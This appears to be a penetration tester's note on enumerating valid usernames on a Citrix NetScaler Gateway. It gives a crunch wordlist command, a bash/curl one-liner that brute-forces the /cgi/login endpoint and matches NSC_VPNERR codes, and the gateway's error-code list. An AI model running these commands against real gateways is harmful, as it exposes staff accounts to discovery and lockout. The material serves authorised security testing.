User Enumeration

Citrix Netscaler Gateway

It is possible to enumerate internal users by brute-forcing the username on the Citrix Netscaler Gateway web interface.

Generate worlist of possible users

Use a tool to generate a wordlist of all possible usernames based on the company schema. An easy example I already run into in a real engagement was the first letter of firstname and the first letter of lastname (i.e. sb).

crunch 2 2 abcdefghijklmnopqrstuvwxyz -o users.txt
Enumerate valid users

Once you have a proper wordlist, enumerate valid users with the following bash one-liner:

for u in $(cat <USERLIST>); do curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=$u" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR=4001" >/dev/null && echo "[+] Found valid user: $u"; done | tee <VALID USERS OUTPUT FILE>

Be careful to not lock users out! In fact, this will try to authenticate using wrong credentials.

Other response status

Get miscellaneous information about any user based on the status response:

curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=<USERNAME>" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR"

All response status codes can be found in the following XML file: https://<HOSTNAME>/logon/themes/Default/resources/en.xml

<String id="errorMessageLabel4001">Incorrect user name or password.</String>
<String id="errorMessageLabel4002">You do not have permission to log on.</String>
<String id="errorMessageLabel4003">Cannot connect to server. Try connecting again in a few minutes.</String>
<String id="errorMessageLabel4004">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4005">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4006">Incorrect user name.  </String>
<String id="errorMessageLabel4007">Incorrect password.</String>
<String id="errorMessageLabel4008">Passwords do not match.</String>
<String id="errorMessageLabel4009">User not found.</String>
<String id="errorMessageLabel4010">You do not have permission to log on at this time.</String>
<String id="errorMessageLabel4011">Your account is disabled.</String>
<String id="errorMessageLabel4012">Your password has expired.</String>
<String id="errorMessageLabel4013">You do not have permission to log on.</String>
<String id="errorMessageLabel4014">Could not change your password.</String>
<String id="errorMessageLabel4015">Your account is temporarily locked.  </String>
<String id="errorMessageLabel4016">Could not update your password. The password must meet the length, complexity, and history requirements of the domain.</String>
<String id="errorMessageLabel4017">Unable to process your request.</String>
<String id="errorMessageLabel4018">Your device failed to meet compliance requirements. Please check with your administrator.</String>
<String id="errorMessageLabel4019">Your device is not managed. Please check with your administrator.</String>
<String id="errorMessageLabelMax">4019</String>

Be careful to not lock users out! In fact, this will try to authenticate using wrong credentials.